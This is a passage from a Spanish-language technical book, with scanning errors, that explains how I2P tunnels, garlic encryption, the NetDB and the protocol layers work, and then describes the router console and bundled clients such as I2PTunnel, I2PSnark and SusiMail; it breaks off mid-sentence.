En la imagen anterior se explica el funcionamiento basico de la transmision de paquetes en I2P por 
medio de tuneles. Como se puede ver, “ ROUTER ]” puede actuar como emisor de un mensaje y 
en tal caso, se encarga de enviar dicho mensaje al primer enrutador de su tunel de salida, tambien 
conocido como “ Gateway ”. Dicho enrutador se encarga posteriormente de obtener la informacion 
del siguiente nodo del tunel, dicho nodo es simplemente un participante y del mismo modo que el 
“Gateway”, se encarga de obtener la direccion del siguiente nodo del tunel para enviar el mensaje. El 
enrutador al final del tunel es conocido como “Endpoint”, ya que se encarga de obtener la direccion 
del “ Gateway ” correspondiente al tunel de entrada de “ROUTER2”. El tunel de entrada recibe el 
mensaje por parte del “ Endpoint ” y se encarga de llevarlo a su correspondiente destino, es decir, a 
“ROUTER2” por medio de todo el tunel de entrada. 
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En el caso de que la instancia “ ROUTER2 ” quiera contestar al mensaje recibido, se debe llevar 
a cabo exactamente el raismo proceso descrito anteriormente, es decir, “ ROUTER2 ” enviara su 
mensaje por medio de su tunel de salida y posteriormente, el tunel de entrada de “ ROUTER !'’ se 
encargara de entregar el mensaje al destino correspondiente. 

Esto quiere decir que para poder realizar una comunicacion completa entre dos instancias de I2P, es 
necesario utilizar dos tuneles de entrada y salida. Evidentemente el rendimiento pueden ser bastante 
deficiente si los enrutadores de alguno de los tuneles presenta demoras o problemas de conectividad, 
por este motivo es tan importante mantener una instancia de I2P levantada todo el tiempo que sea 
posible con el fin de que el enrutador pueda conocer otros enrutadores que tengan buenos niveles de 
conectividad y que sean adecuados para construir tuneles estables. 


Aunque el numero de enrutadores de un tunel de entrada o salida es configurable, por defecto todos 
los tuneles se construyen con tres repetidores, ya que de esta forma, se consigue un buen equilibrio 
entre el rendimiento del tunel y su anonimato. Por otro lado, todos los paquetes de datos que viajan 
por un tunel se encuentran cifrados desde el origen, de tal forma que solamente el destinatario de 
dicho mensaje es capaz de acceder al contenido del paquete. 



Imogen 02.06: Configuracion de Tuneles en I2P. 


2.2.2 Prepocesamiento de Mensajes I2NP y mensajes Garlic 

Como se ha comentado anteriormente, I2P es una red enfocada a los mensajes, los cuales son 
enviados desde un emisor hacia un destinatario por medio de una serie de tuneles que se encargan 
del envlo del mensaje. Evidentemente, para conservar el anonimato y la privacidad de la informacion 
transferida, es necesario que dichos mensajes tengan un formato especlfico y una serie de capas de 
cifrado que impidan que un tercero pueda acceder a la informacion en piano. Es en este punto en el 
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que entra en juego el protocolo I2NP, el cual es el encargado de definir el formato y las reglas basicas 
para construction de mensajes y posterior envlo entre cada uno de los enrutadores que conforman 
un tunel de salida. Antes de que un mensaje pueda ser enviado a su correspondiente destino por 
medio de un tunel. el gateway del tunel de salida (primer enrutador del tunel) se encarga de acumular 
un numero fijo de mensajes I2NP del cliente y los preprocesa, fragmentandolos y mezclandolos, 
produciendo de esta forma lo que se conoce como “mensajes de tunel”. 

Los mensajes en I2NP tienen un tamano variable entre 0 y 64KB, mientras que los mensajes de 
tunel tienen un valor fijo de 1KB, de esta forma se consigue evitar un posible ataque contra dichos 
mensajes basandose en su tamano. Cuando el gateway tennina de procesar los mensajes I2NP 
enviados por el emisor convirtiendolos en mensajes de tunel, procede a empaquetar dichos mensajes 
con los datos necesarios para indicar cuales son los participantes del tunel y a que enrutadores se 
debe reenviar el mensaje. 

Finalmente, el mensaje es ciffado aplicando multiples capas de cifrado, utilizando la clave publica 
de cada uno de los participantes del tunel, generando de esta forma lo que se conoce como “mensaje 
garlic”, los cuales son los mismos mensajes de tunel pero ciffados utilizando los algoritmos ElGamal/ 
AES SessionTag. Cuando el mensaje garlic pasa por cada uno de los participantes del tunel, se 
remueve una de las capas del mensaje (clove) de tal forma que cuando dicho mensaje llega a uno de 
los participantes del tunel, dicho participante solamente puede acceder a las instrucciones de entrega 
en las que se indica cual es el siguiente enrutador por el que debe pasar el mensaje, pero no tiene la 
posibilidad de acceder al mensaje en claro, ya que se encuentra ffagmentado y recubierto por otras 
capas de ciffado. 

El punto de salida final del tunel, es el encargado de remover la ultima capa de ciffado del mensaje 
garlic, accediendo de esta forma al mensaje de tunel. Dicho enrutador se encarga de reensamblar los 
ffagmentos del mensaje I2NP original y reenviar dicho mensaje hacia el gateway correspondiente al 
tunel de entrada del destinatario, el cual a su vez, se encarga de aplicar las mismas rutinas que realiza 
el gateway del tunel de salida, es decir, ffagmentar el mensaje I2NP recibido, mezclar los ffagmentos 
generando un mensaje de tunel y finalmente, ciffar el mensaje de tunel para producir un mensaje 
garlic, el cual sera enviado al primer participante del tunel de entrada del destinatario. 

La siguiente imagen ha sido tomada del sitio web oficial de I2P (https://geti2p.net) la cual sera 
utilizada para explicar de forma resumida la explication anterior sobre el procesamiento y enrutado 
de mensajes por medio de los tuneles de entrada y salida de I2P. 


Outbound tunnel 


Inbound tunnel 






Alice 

Outbound 

Gateway 


Outbound Outbound Inbound 

Participant _ Endpoint _ Gateway 
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Bob 

Inbound 
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Imogen 02.07: Tuneles de entrada y salida en 12P. 
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A continuacion se explica el rol que asume cada uno de los enrutadores ensenados en la imagen 
anterior y las operaciones que realiza para la transferencia de mensajes. 

Outbound Gateway 

Se encarga de acumular una serie de mensajes I2NP para que sean reenviados a sus correspondientes 
destmatarios. Posteriormente, dichos mensajes son fragmentados y mezclados, produciendo 
mensajes con un tamano fijo de 1KB, dichos mensajes son conocidos como mensajes de tunel y 
tienen una estructura bien definida en la que se incluyen los detalles necesarios para reensamblar los 
fragmentos de los mensajes I2NP y ademas, las indicaciones necesarias para enrutar los mensajes 
por cada uno de los enrutadores que componen el tunel de salida. Posteriormente, los mensajes de 
tunel son cifrados de forma iterativa utilizando las operaciones de cifrado comunes en la red de I2P 
por medio de los algoritmos ElGamal/AES SessionTags. 

El resultado de dichas operaciones son los mensajes garlic, los cuales estan compuestos por multiples 
capas de cifrado, que solamente se pueden remover utilizando la clave privada de cada uno de los 
enrutadores del tunel. Finalmente, el gateway se encarga de reenviar el mensaje cifrado al siguiente 
salto, es decir, al participante del tunel (Outbound Participant). 

Outbound Participant 

El participante del tunel de salida se recibe el mensaje enviado por el gateway y a continuacion, se 
aplica su clave privada para descifrar una de las capas que incluyen los mensajes garlic. 

El resultado de esta operacion de descifrado le permite al participante acceder a la informacion 
necesaria para conocer cual es el siguiente enrutador al que se debe reenviar el mensaje y 
posteriormente lo reenvia, el cual como se ha comentado antes, ya no contiene la capa de cifrado 
correspondiente al enrutador participante. 

Outbound Endpoint 

El enrutador final del tunel de salida se encarga de aplicar el proceso de descifrado sobre el mensaje 
garlic enviado por el participante y el resultado de dicha operacion, es el mensaje de tunel. A 
continuacion, reensambla los fragmentos correspondientes al mensaje I2NP y una vez que se ha 
recompuesto el mensaje, procede a reenviarlo hacia el gateway del tunel entrante del destinatario. 

Inbound Gateway 

Del mismo modo que el gateway de un tunel de salida, un gateway de un tunel de entrada debe 
preprocesar los mensajes de tunel recibidos, aplicando nuevamente la fragmentacion, mezclado y 
cifrado de dichos mensajes. Una vez cumplidas estas labores, se encarga de reenviar el mensaje al 
siguiente enrutador del tunel. 

Inbound Participant 

A diferencia de un participante en un tunel de salida, un participante en un tunel de entrada no 
descifra los mensajes enviados desde el gateway, en su lugar se encarga de cifrarlos utilizando la 
clave publica del enrutador final del tunel de entrada. De esta forma, el participante cifra el mensaje 
y posteriormente lo reenvia al siguiente enrutador que compone el tunel. 
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Inbound Endpoint 

El enrutador final del tunel de entrada se encarga de aplicar el proceso de descifrado de forma iterativa 
sobre el mensaje garlic enviado por el participante y operando de un modo similar al enrutador final 
del tunel de salida, se encarga de reensamblar los fragmentos correspondientes al mensaje I2NP 
que se encuentran en el mensaje de tunel descifrado. Finalmente. recupera la informacion de los 
mensajes enviados por el emisor. 

2.2.3 Base de datos de la red (NetDB) 

La primera vez que una instancia en ejecucion de I2P quiere contactar con otro enrutador en la red, 
ambos hacen una consulta contra una base de datos de red que funciona de forma completamente 
distribuida, dicha base de datos en la terminologia de I2P es conocida como NetDB. Se trata de una 
tabla hash distribuida (Distributed Hash Table) con una estructura que se basada en el algoritmo 
Kademlia. Las consultas que realizan los usuarios de la red contra esta base de datos son almacenadas 
localmente, de tal forma que encontrar y acceder a los tuneles de entrada de otros destinatarios es 
mucho mas eficiente, ya que no hace falta realizar una nueva busqueda contra la base de datos de 
la red. 

Evidentemente, la NetDB es un elemento vital para el correcto fimcionamiento de la red y para que 
los usuarios puedan localizar los tuneles de entrada de los destinatarios y construir tuneles. Los tipos 
de datos que se comparten en esta base de datos son: “ routerlnfo ” y ' ’ / eas e Set s'' .Los metadatos del 
tipo routerlnfo le dan a cada enrutador la informacion necesaria para crear y conectar el tunel de 
salida del emisor con el tunel de entrada del receptor. Dicha informacion incluye elementos tales 
como claves publicas, direcciones, entre otras cosas. 

La imagen que se ensena a continuacion explica la forma en la que una instancia de I2P realiza una 
consulta contra la base de datos de red para obtener los enrutadores necesarios que serviran para 
construir un tunel de salida. 



Imogen 02.08: Consulta "routerlnfo ” contra la base de datos de la red. 

Por otro lado, los leaseSets son los metadatos que suministran la informacion necesaria para 
contactar con el destino, esta informacion incluye los siguientes campos: 
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1. Direction del Gateway del tunel de entrada del destinatario. 

2. Fecha y hora de expiration del tunel. Este campo es importante ya que la duration de los 
tuneles es limitada y se construyen dinamicamente. 

3. La clave publica de cada enrutador del tunel para cifrar los mensajes que se enviaran. 



Se trata de informacion que se actualiza por cada enrutador de forma automatica. Una de las 
principales diferencias entre los metadatos “routerInfo y “ leaseSef ’, es que la informacion 
correspondiente a los metadatos “ routerlnfo ” es enviada directamente al servicio de NetDB para que 
todos los enrutadores de la red puedan consultarla, mientras que los “leaseSets deben ser enviados 
por medio de un tunel de salida para conservar el anonimato del usuario y de esta forma, evitar 
cualquier tipo de correlation entre los enrutadores, los “ leaseSets ” y los destinos. 

Todo lo explicado anteriormente se resume en el siguiente fiujo de acciones. 

1. El emisor quiere enviar un mensaje a un destino y lo busca en la NetDB para encontrar los 
metadatos correspondientes al “ leaseSef ’ de dicho destino, obteniendo de esta forma el gateway 
de su tunel de entrada. 

2. A continuation, construye o elige uno de sus tuneles de salida y envia el mensaje con 
instrucciones para que el punto final del tunel de salida reenvie el mensaje al gateway 
correspondiente al tunel de entrada del destinatario, el cual como se recordara, se ha consultado 
en la base de datos de la red en el paso anterior. 

3. Cuando el punto final del tunel de salida recibe estas instrucciones, reenvia el mensaje al 
gateway del tunel de entrada del destino. 

4. Cuando el gateway del tunel de entrada del destino recibe el mensaje, se encarga de enviarlo 
al siguiente salto del tunel hasta llegar al enrutador correspondiente. 

5. Si el emisor desea que el destinatario pueda responder al mensaje, necesita enviar junto con 
su mensaje, de forma explicita, una forma de localizar el tunel de entrada del destinatario. Para 
ello, existen dos posibilidades: 
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a. Introduciendo una capa de datos adicional en la que se incluya el “ Destination ” 
del emisor, dicho campo le permitira al destinatario realizar una consulta contra la base 
de datos de la red y localizar el gateway del tunel de entrada del emisor. 

b. El emisor envia su propio “leaseSeF como parte del mensaje para que el 
destinatario pueda localizar el gateway del tunel de entrada del emisor sin necesidad 
de consultar la base de datos de la red, acortando el tiempo de respuesta y el numero de 
peticiones necesarias para el envio de un mensaje. 

Por otro lado, la base de datos de la red se distribuye con una tecnica llamada “ FloodFilF (inundado), 
la cual se basa en el uso de una serie de enrutadores llamados “floodfilF, los cuales se encargan 
de mantener la base de datos distribuida y de sincronizar la informacion correspondiente de los 
“leaseSeF y “routerInfo" que se encuentran en la red. Estos enrutadores representan un mecanismo 
de almacenamiento distribuido y determinan cuales hacen parte del ‘ floodfilF de la base de datos 
de la red. Esto es algo simple, ya que dicha informacion aparece en el “ routerlnfo ” publicado por 
cada enrutador. 

Un enrutador floodfill no tiene ningun tipo de autoridad central y no forma parte de ningun 
“consenso”, solo implementa una capa DHT. A diferencia de las autoridades de directorio de Tor, los 
enrutadores ‘ ‘floodfilF que conforman la base de datos de la red, no son unos enrutadores fijos ni de 
confianza, cualquier enrutador en la red puede convertirse en un “floodfilF si esta configurado para 
compartir un gran ancho de banda. 

Los enrutadores con unos limites amplios de comparticion de ancho de banda suelen tener conexiones 
de baja latencia, y es mas probable que esten disponibles la mayor parte del tiempo. En este sentido, 
para que un enrutador en I2P pueda convertirse en un ‘ floodfilF debe compartir como minimo, un 
ancho de banda de 128 KB/sec. Lo anterior le permitira al enrutador poder intentar cumplir con 
algunas pruebas adiciones sobre su “salud”, pruebas que tipicamente consisten en medir los tiempos 
de espera de los mensajes y los retrasos. 

Una vez cumplidas dichas pruebas, el enrutador se activara automaticamente como un “floodfilF. 
Algunos enrutadores se configuran manualmente para ser floodfill, pero aquellos con un gran ancho 
de banda y buenos niveles de repuesta, pasan a convertirse automaticamente en floodfill cuando el 
numero de enrutadores de este tipo en la red cae a un limite minimo y luego, estos enrutadores dejan 
de ser “floodfill” cuando se consiguen unos niveles normales de floodfills activos, algo que puede 
ocurrir cuando se ejecutan ataques contra la red. 


2.2.4 Protocolos y capas 

I2P se basa en el modelo OSI clasico, pero evidentemente implementa algunas capas y protocolos 
adicionales que permiten realizar conexiones anonimas sobre TCP o UDP. Algunas de estas capas 
cuentan con protocolos especificos que se han desarrollado para I2P y que resulta conveniente 
conocer. La imagen 02.10 ha sido tomada del sitio oficial de 12P y ensena cada una de unas las capas 
de la pila de protocolos en I2P. A continuacion se procede a explicar la finalidad de cada una de estas 
capas partiendo de las mas altas y como encaja en el modelo de anonimato de I2P. 
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Imogen 02.10: Pita de protocolos en I2P 


2.2.4.1 Capa de Aplicacion 

Aqui se encuentran las aplicaciones que permiten el acceso por parte de los clientes a toda la 
mffaestructura de I2P para el envio y recepcion de mensajes de forma anonima. En esta categoria 
se encuentran se encuentran plugins, eepsites, aplicaciones de streaming etc. Sobre estos servicios 
y aplicaciones se hablara en detalle en la proxima section de este documento. Por otro lado, una 
de las caracteristicas mas interesantes I2P a la hora de crear y exponer servicios ocultos. es que 
soporta protocolos como TCP, UDP o ICMP, protocolos que son soportados por otras soluciones de 
anonimato como es el caso de Tor. En el caso del protocolo UDP, en 12P existen algunas aplicaciones 
que se ejecutan sobre dicho protocolo, tales como I2PSnark, Syndie y I2Phex y tal como se vera 
mas adelante, la libreria Streaming Library permite crear aplicaciones que se pueden intearar muy 
facilmente con I2P y que se basan en TCP. 

2.2.4.2 Capa de Cifrado Garlic 

Esta capa provee cifrado punto a punto de los mensajes que viajan entre los tuneles del emisor y 
receptor. Es una capa muy importante ya que es la que comunica la capa de aplicacion con las capas 
infenores y el cifrado a este nivel permite que todos los paquetes que viajan en las capas de mas bajo 
nivel no puedan descifrar el mensaje que se trata de enviary/o recibir por parte de los participantes de 
cada tune I. Como se ha mencionado anteriormente, todos los mensajes en I2P tienen una estructura 
y un formato que se encuentra definido en la especificacion I2NP (12P Network Protocol) y antes de 
enviar un mensaje se sigue un proceso de fragmentation, cifrado y posterior envio de los paquetes 
resultant.es. En esta capa se transportan los mensajes cifrados, tambien conocidos como mensajes 
Gallic . Ademas de aplicar un cifrado “ end-to-end ” al mensaje utilizando la clave publica del 
destinatano, en esta capa tambien se anaden las capas de cifrado correspondientes a cada uno de los 
participantes del tunel de salida del emisor. 

2.2.4.3 Capa de Tuneles 

En esta capa se obtiene el listado de los participantes de cada tunel y los detalles necesarios para el 
envio de mensajes a su correspondiente destino. Esta capa es anterior a la capa de cifrado y tal como 
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se ha explicado en una seccion anterior de este documento, aqui se generan los mensajes de tunel, 
los cuales contienen mensajes I2NP fragmentados y separados en bloques de tamanos fijos. En este 
punto merece la pena recordar que las claves para cifrar los mensajes de tunel, que posteriormente 
se convertiran en mensajes “ Garlic ”, son distintas a las claves utilizadas para las capas de cifrado 
que se aplican sobre dicho mensaje para enviarlo por cada salto de los tuneles de salida y entrada. 

Los mensajes “ Garlic ” no pueden ser descifrados por ningun enrutador participante en el tunel de 
entrada o salida, ya que no cuentan con la clave privada del receptor para obtener el mensaje en 
texto claro. Tal como se ha explicado en la capa anterior a esta (capa de cifrado), el emisor ha tenido 
que utilizar la clave publica del receptor para cifrar el mensaje antes de enviarlo por los tuneles de 
comunicacion, la cual probablemente ha sido obtenida del “ LeaseSets ” registrado en el servicio de 
NetDB. Aunque solamente el receptor con su clave privada podra descifrar los mensajes cifrados por 
el emisor, en esta capa se obtienen las instrucciones de entrega y las claves publicas de cada uno de 
los participantes del tunel para anadir una capa de cifrado equivalente a cada salto del tunel, de esta 
forma cada enrutador podra acceder unicamente a la informacion necesaria para enviar el mensaje 
al siguiente salto y el contenido del resto del mensaje le resultara ilegible. 


2.2.4.4 Capa de Transporte I2P 

Se trata de una extension de la capa de transporte clasica soportada por practicamente todos los 
sistemas de comunicacion existentes hoy en dia, sin embargo en el caso de I2P, esta capa implementa 
un cifrado entre dos enrutadores en I2P y aunque el cifrado de la comunicacion no implica en este 
punto ningun tipo de anonimato, permite la comunicacion segura entre dos enrutadores. 

El protocolo especifico que se debe implementar en esta capa depende de aquel que soporte la capa 
de aplicacion; por ejemplo, anteriormente se ha mencionado que “ UPSnark ” soporta UDP, en estos 
casos se debe usar protocolo UDP en la capa de transporte y SSU en esta capa. En I2P se utilizan dos 
implementaciones especiales de la capa de transporte de I2P: NTCP y SSU. 

SSU: Protocolo utilizado en conexiones salientes sobre el protocolo UDP. Proporciona una capa 
de transporte segura, cifrada y no orientada a la conexion, ademas de que tambien provee servicios 
de deteccion automatica de IP. servicios NAT, deteccion de firewalls y deteccion de cambios de 
configuracion en el segmento de red donde se ejecuta I2P. Estos servicios son ampliamente utilizados 
por NTCP para su correcto funcionamiento, por lo tanto puede decirse que existe una relacion de 
dependencia entre ambos protocolos. 

NTCP: Se trata de un protocolo de transporte basado en Java y que resulta ser mas eficiente que 
el protocolo TCP sobre el que esta construido ya que soporta la especificacion NIO de Java para 
manejar multiples conexiones utilizando varios hilos, dando un desempeno mucho mas adecuado. 
NTCP utiliza una direccion IP y un puerto (que deben mantenerse privados para el uso de I2P) los 
cuales son auto-detectados por defecto dependiendo de la direccion IP publica del gateway que 
proporciona la salida a internet, sin embargo estos valores pueden modificarse desde la consola de 
administration de I2P, concretamente en la seccion de configuracion que se encuentra ubicada en la 
siguiente rata: http://127.0.0.1:7657/config 
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2.2A.5 Capa de Transporte y capa IP 

Se trata de las capas definidas en el modelo de referenda OSI. En este caso concreto. I2P se basa 
en los protocolos TCP y UDP. Tal como se ha indicado en los parrafos anteriores, estos protocolos 
representan la base de la capa de transporte de 12P, en la cual se utilizan los protocolos SSU y 
NTCP. La capa TP representa el nivel mas bajo y proporciona conectividad entre dos maquinas, su 
implementacion sigue el modelo de referenda estandar OSI para la interconectividad, permite la 
asignacion de direcciones IP validas y el enrutamiento de paquetes sobre redes de datos. 


2.3 Gestion de servicios y complementos en I2P 

Tal como se ha visto anteriormente. la principal herramienta para gestionar todos los detalles de 
configuracion, conexiones, tuneles, aplicaciones de usuario y servicios varios, es la interfaz web 
conocida como “UP Router Console” esta consola de administracion utiliza el puerto “7657” por 
defecto y es posible acceder a ella desde cualquier navegador web. Las opciones disponibles en I2P 
se pueden ver en la imagen 02.11 y a continuacion se explicaran las fiincionalidades de cada una de 
las opciones incluidas en la interfaz web. 



Imogen 02.11: Consola de administracion de I2P. 
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HELP & FAQ 

Como su nombre lo indica, incluye information de ayuda y algunas preguntas frecuentes sobre el 
uso de I2P. 

I2P SERVICES 

Permite acceder a la configuracion de los servicios disponibles para I2P. Permite arrancar, editar y 
borrar servicios existentes, asi como tambien desplegar servicios extemos. 

I2P INTERNALS 

Permite ver y editar los detalles configuracion de la instancia de I2P en ejecucion. Desde esta option 
se puede editar la configuracion de tuneles, perfiles, la base de datos de la red, estadlsticas, etc. 
Ademas, desde aqui tambien se puede acceder a la herramienta “ I2PTunneF, que tal como se vera 
mas adelante, es de vital importancia para la creation y gestion de servicios en I2P. 

GENERAL 

esta option se incluye information basica sobre el enrutador local, incluyendo la identidad local 
con la information sobre la instancia que sera almacenada en la base de datos de la red. (NetDB). 
Tambien es posible ver otros detalles basicos como version de I2P que utiliza el enrutador y el 
tiempo que lleva ejecutandose. 

NETWORK 

Indica el estado general de la red y si existe algun tipo de problema de conectividad. En esta section 
se podra ver si existe un firewall que se encuentra bloqueando las conexiones en determinados 
puertos. 

PEERS 

El numero total de enrutadores conocidos, activos, integrados, rapidos y de alta capacidad a los 
que tiene acceso una instancia de I2P. Los valores que se pueden ver en esta section suelen ir 
aumentando en la medida que el enrutador se integra en la red. 

BANDWIDTH IN/OUT 

Indica los limites en bytes por segundo para el ancho de banda entrante y saliente. Desde aqul 
tambien es posible modificar estos limites. 

TUNNELS 

Se ensenan todos los tuneles de entrada y salida en los que participa el enrutador, asi como tambien 
los siguientes tipos de tuneles: 

- Exploratory’-. Tuneles construidos por la instancia de I2P que son utilizados unicamente 
para probar los tuneles existentes y la construction de nuevos. Su funcionamiento es vital para 
que la instancia de I2P mantenga un registro de los mejores enrutadores que se encuentran en 
la red y de esta forma, poder construir tuneles rapidos. 

- Client: Tuneles construidos por el enrutador y que son utilizados principalmente por otros 
enrutadores y aplicaciones que actuan como clientes. 

- Participating: Se trata de aquellos tuneles en los cuales la instancia local de I2P actua 
como enrutador participante, es decir, que simplemente se encarga de enrutar el trafico de 
los tuneles construidos por otros enrutadores en la red. Este valor es dinamico puede variar 
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dependiendo del porcentaje de ancho de banda compartido. Tambien es posible definir un 
lim'te a este valor por medio de las opciones avanzadas de configuracion de I2P estableciendo 
la propiedad “router.maxParticipatingTunnels” en el fichero de configuracion “router.config” 
el cual generalmente se encuentra ubicado en “<HOME USER>/.i2p”. 

- Share Ratio: No se trata de un tipo de tunel, sino que simplemente indica el porcentaje 
de ancho de banda compartido por la instancia local de I2P, el cual es el resultado de dividir 
el numero de tuneles en los cuales el enrutador es participante sobre el la suma de todos los 
tuneles del tipo “client" y “ Exploratory ”. Si este valor es superior a 1.00 significa que se esta 
contribuyendo a mas tuneles en la red de los que se estan usando. 

CONGESTION 

Ensena algunos valores basicos del enrutador para determinar si se encuentra sobrecargado. Los 
valores que se ensenan en la interfaz se listan a continuation. 

Job Lag. Se trata del promedio de tiempo en el que las tareas en ejecucion se encuentran 
en estado de espera. Este valor como norma general debe ser igual a 0 o muy bajo, si por el 
contrario se aprecia que se encuentra por encima de los 500ms, indica que el ordenador en el 
que se ejecuta la instancia de I2P cuenta con pocos recursos de procesamiento y/o memoria 
o existe un problema de conectividad con el enrutador. 

- Message Delay: Se trata del promedio de tiempo en el que permanecen los mensajes 
en los tuneles de salida antes de ser enviados a los correspondientes tuneles de entrada de 
cada destino. Si el enrutador se encuentra correctamente configurado y no hay problemas 
de conectividad, este valor se encontrara por debajo de los 1000ms, si por el contrario se 
encuentra constantemente por encima, indica que el ordenador no cuenta con los recursos de 
procesamiento y/o memoria suficientes o existe un problema de conectividad. En este caso 
concreto, siempre es recomendable aumentar los limites de banda ancha. 

- Tunnel Lag: Se trata del tiempo de ida y vuelta para la prueba de tuneles de exploracion 
y clientes. Dichas pruebas consisten en el envlo de un mensaje de un cliente a un tunel 
de exploracion y viceversa. El resultado de esta prueba debe ser un valor igual o menor 
a 5 segundos, de lo contrario es posible que el ordenador no tenga suficientes recursos de 
procesamiento y/o memoria o los limites de ancho de banda deben ampliarse para que los 
tuneles tengan un mejor desempeno. 

LOCALTUNNELS 

Desde el punto de vista de los usuarios y clientes, probablemente esta es la opcion mas interesante 
ya que desde aqui, se pueden crear y configurar las aplicaciones que se ejecutaran en la instancia 
local de I2P. En esta opcion se puede acceder a la gestion de los servicios ocultos que se encuentran 
mstalados y se pueden ver los mensajes de estado, tuneles de servidores (tuneles de entrada) v 
tuneles cliente (tuneles de salida). 

Cuando un usuario instala I2P en su ordenador, automaticamente se instala tambien un servidor de 
aplicaciones J2EE Jetty, este servidor es el que tiene desplegada la interfaz de administracion de 
I2P y tambien es posible alojar contenido personalizado en el, tales como paginas web estaticas, 
lmagenes, documentos y cualquier otro recurso que sea de interes para el usuario. Por otro ladoi 
tambien es posible incluir paginas JSP y Servlets, dado que el servidor soporta la especificacion 
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correspondiente. Tal como se vera a lo largo de este documento, los sitios web creados en una 
instancia de I2P son llamados “eepsites" y unicamente estaran disponibles en la web profunda de 
I2P. Si bien es cierto que los eepsites son los tipos de servicios mas comunes en I2P, es posible crear 
multiples tipos de servicios ocultos sobre protocolos tales como TCP o UDP. A continuation, se 
explican algunos de los clientes que vienen incluidos por defecto en una instancia de I2P y como se 
puede crear servicios ocultos en la web profunda de I2P utilizando la aplicacion I2PTunnel. 


2.3.1 Clientes y servicios en I2P 

I2PTunnel 

Tal como se ha mencionado anteriormente, I2P cuenta con una plataforma muy completa a la 
hora de crear diversos tipos de servicios a nivel de aplicacion para los usuarios que ingresan a 
la web profunda de I2P. Por defecto, existen algunos servicios preconfigurados que actuan como 
clientes y pueden ser administrados desde la interfaz web de administration, la cual como se ha 
dicho antes, se encuentra disponible en la opcion “Local Tunnels ” y recibe el nombre de I2PTunnel. 
Estas aplicaciones permiten establecer servicios para la red de I2P, habilitando el uso de correo 
electronico, bittorrents, servidores proxy, eepsites, etc. Como se puede ver en la imagen 02.12, 
I2PTunnel permite gestionar el estado de cada uno de los servicios ocultos y tuneles cliente de una 
instancia local de I2P. En la imagen solamente se puede visualizar la opcion para crear servicios 
ocultos, sin embargo, al final de la section correspondiente a “ I2P Client Tunnels ” es posible crear 
tuneles de tipo cliente para acceder a servicios que se encuentran en la web profunda de I2P, tales 
como servicios de correo electronico, IRC, servidores proxy, entre otros. 



Imagen 02.12:12PTunnel para la gestion de servicios ocultos y tuneles cliente. 
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De forma predefinida, I2PTunnel viene configurado con dos tuneles cliente que apuntan a servidores 
proxy que permiten acceder a la web profunda de I2P utilizando el protocolo HTTP o HTTPS. No 
obstante por defecto tambien tiene configurados algunos otros tuneles cliente, para el acceso al 
repositorio de fuentes Monotone del proyecto I2P, para utilizar los servidores SMTP y POP3 de 
“ Postman ” en la web profunda de I2P, entre otros. 

Por otro lado, en la seccion de servicios ocultos, por defecto solamente viene configurado con un 
eepsite bastante simple que se encuentra levantado en la maquina local en el puerto “7658” y el cual 
es accesible por otros usuarios en la web profunda de I2P. 

I2PSnark 

Se trata un cliente de Torrents en I2P que viene configurado por defecto en cualquier instancia de 
I2P. Existen algunas otras soluciones similares, tales como PyBit y Robert, las cuales se instalan 
de forma independiente. Esta aplicacion permite compartir y transferir ficheros entre distintos 
destinos de la red de forma privada y anonima. I2PSnark se encuentra disponible desde la interfaz 
de administracion del enrutador en la seccion “I2P Services —» Torrents” y la URL utilizada para 
acceder a dicha aplicacion es la siguiente: http://127.0.0.1:7657/i2psnark 

La imagen 02.13 ensena la interfaz de la aplicacion y las opciones disponibles para subir y descargar 
torrents desde la red de I2P. Un torrent puede tener su origen en el sistema de ficheros local o en 
alguna localizacion en Internet. Una de las principals desventajas de transferir torrents en I2P es 
que no suele ser un proceso rapido y la velocidad de descarga o de subida de ficheros suele verse 
muy afectada en instancias de I2P que no se encuentran bien integradas en la red. 



Imogen 02.13: Interfaz de I2PSnark. 


Para utilizar esta herramienta y descargar ficheros utilizando torrents existentes, solamente es 
necesario indicar la ruta donde se encuentra el fichero *.torrent, o si se cuenta con dicho fichero, se 
debe ubicar en <DATA_DIRECTORY_I2P>/.i2p/i2psnark. 

En cualquiera de los dos casos se debe esperar unos cuantos minutos antes de que el proceso de 
descarga comience. 
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El uso de esta herramienta es muy intuitivo y no requiere demasiadas explicaciones para comprender 
su funcionamiento, en la parte superior estan los enlaces correspondientes a cada repositorio I2P 
para ver cuales torrents se encuentran disponibles para su descarga. Por otro lado tambien se pueden 
especificar ficheros con formato magnet y maggot, estas direcciones normalmente se encuentran 
disponibles en cada uno de los tracker (repositorios) disponibles. 

Los principales repositorios de torrents en la web profunda de I2P son Postman (tracker2.postman. 
i2p) y Diftracker (diftracker.i2p) los cuales contienen un listado bastante completo de torrents con 
libros, peliculas, documentos, programas, manuales, etc. Suelen ser los repositorios de referencia a 
la hora de descargar contenidos via torrent en la web profunda de I2P. 

SusiMail 

Se trata de un cliente de correo electronico que permite el envio y recepcion de mensajes de 
forma anonima y que viene incluido en cualquier instancia de I2P. Para acceder a esta aplicacion 
es necesario dirigirse a la siguiente ruta http://127.0.0.1:7657/susimail/susimail. Para utilizar este 
cliente, es necesario crear una cuenta de correo en el servicio de PostMan localizado en el interior 
de la red de I2P en el siguiente enlace http.V/hq.postman.i2p/?page_id=16. 

En dicha pagina se incluyen las opciones para que un usuario pueda ingresar sus datos para el 
registro de una nueva cuenta de correo electronico y una vez que se ha creado dicha cuenta, es 
posible utilizar SusiMail ingresado el nombre de usuario y contrasena elegidos. No obstante es 
necesario esperar algunos minutos o incluso una hora, antes de que la cuenta se encuentre disponible 
para su uso. Su interfaz es muy sencilla y consta de las opciones basicas para verificar correos 
entrantes, eliminar y redactar mensajes. El envio y recepcion de mensajes no se encuentra limitada 
unicamente a servicios que se encuentran en la web profunda de I2P, tambien es posible enviar 
y recibir mensajes a cualquier servicio de mensajeria en la “web clara”, como por ejemplo a los 
servicios de correo convencionales, tales como Gmail o Yahoo. 

La configuracion por defecto de todas las cuentas que se crean en PostMan cuentan con algunas 
restricciones relacionadas con el envio de mensajes, los cuales pueden tardan entre 10 y 50 minutos 
en llegar a su destino. Sin embargo es posible administrar la cuenta de PostMan desde el siguiente 
enlace: http://hq.postman.i2p/?page_id=19. Las opciones de configuracion incluidas en el servicio 
permiten cambiar este y otros parametros de la cuenta. Algunas de las caracteristicas que pueden 
activarse en una cuenta de PostMan incluyen el escaneo de virus en emails entrantes, notificaciones 
sobre correos potencialmente daninos, entre otras cosas que ayudan a mejorar la privacidad y la 
seguridad de los usuarios. 

SusiDNS 

Tal como se ha mencionado anteriormente en este capitulo, SusiDNS es una aplicacion que viene 
